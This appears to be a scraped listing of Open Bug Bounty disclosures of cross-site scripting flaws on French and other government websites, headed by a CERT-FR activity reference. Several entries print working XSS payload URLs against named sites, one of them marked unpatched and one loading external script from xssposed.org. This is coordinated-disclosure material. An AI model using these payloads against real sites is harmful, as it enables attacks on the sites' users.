CERTFR-2025-ACT-040

creationtimestamp| type| source ---|---|--- 2025-09-22 13:50:46+00:00| seen| https://social.numerique.gouv.fr/users/certfr/statuses/115248270209420806 2025-09-22 13:50:46+00:00| seen| https://bsky.app/profile/cert-fr.bsky.social/post/3lzgkhmqreb25 2025-09-22 14:34:31+00:00| seen|...

anom.archivesnationales.culture.gouv.fr Cross Site Scripting vulnerability OBB-3664996

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

store.agriculture.gouv.fr Cross Site Scripting vulnerability OBB-1229083

Following coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: &nbsp&nbsp&nbsp&nbsp&nbsp&nbspa. verified the vulnerability and confirmed its existence; &nbsp&nbsp&nbsp&nbsp&nbsp&nbspb. notified the website operator about its existence...

mesdemarches.agriculture.gouv.fr Cross Site Scripting vulnerability

Open Bug Bounty ID: OBB-978278 Security Researcher devl00p Helped patch 3025 vulnerabilities Received 10 Coordinated Disclosure badges Received 15 recommendations , a holder of 10 badges for responsible and coordinated disclosure, found a security vulnerability affecting...

transports.gouv.qc.ca XSS vulnerability

Open Bug Bounty ID: OBB-674141 Description| Value ---|--- Affected Website:| transports.gouv.qc.ca Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...

carte-grise-gouv.fr XSS vulnerability

Open Bug Bounty ID: OBB-620107 Description| Value ---|--- Affected Website:| carte-grise-gouv.fr Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...

visiterhaiti.gouv.ht XSS vulnerability

Open Bug Bounty ID: OBB-608536 Description| Value ---|--- Affected Website:| visiterhaiti.gouv.ht Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...

telerc.travail.gouv.fr XSS vulnerability

Open Bug Bounty ID: OBB-571397 Description| Value ---|--- Affected Website:| telerc.travail.gouv.fr Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Disclosure Standard:| Coordinated...

frqnt.gouv.qc.ca XSS vulnerability

Vulnerable URL:...

pastel.diplomatie.gouv.fr XSS vulnerability

Vulnerable URL: https://pastel.diplomatie.gouv.fr/tdstage/conditions.asp?etablissement=="' /Style=position:fixed;top:0;left:0;font-size:999px; /Onmouseenter=confirmOPENBUGBOUNTY // Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS...

immigration.interieur.gouv.fr XSS vulnerability

Open Bug Bounty ID: OBB-212070 Description| Value ---|--- Affected Website:| immigration.interieur.gouv.fr Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...

portail.cp.finances.gouv.fr XSS vulnerability

Vulnerable URL: https://portail.cp.finances.gouv.fr/portail/faqext.cgi?showrubriq="//confirm/OPENBUGBOUNTY///...

www2.impots.gouv.fr XSS vulnerability

Vulnerable URL: http://www2.impots.gouv.fr/divers/sitfiscsourd/mediaplayer.swf?file=../flash/projectstory.flv?file=http://content.bitsontherun.com/videos/bkaovAYt-364766.flv=falseℑ=http://appsec.ws/ExploitDB/cMon.jpg=true=javascript:confirm/openbugbounty/;//=blank&.swf Details: Description| Value...

haute-marne.gouv.fr XSS vulnerability

Vulnerable URL: http://www.haute-marne.gouv.fr/Outils/Glossaire/namefilter/Y%22%3E%3Cmarquee%20onstart=prompt/OPENBUGBOUNTY/%3E Details: Description| Value ---|--- Patched:| Yes, at 28.07.2017 Latest check for patch:| 28.07.2017 11:33 GMT Vulnerability type:| XSS Vulnerability status:| Publicly...

interieur.gouv.fr XSS vulnerability

Vulnerable URL: http://www.interieur.gouv.fr/content/search?SearchText=%22/%3E%20%3Cescript%3Ee=document.createElement%28%27escript%27%29;e.src=%27httpss://xssposed.org/1.js%27;document.body.appendChild%28e%29;%3C/escript%3E=438 Details: Description| Value ---|--- Patched:| Yes, at 09.10.2015...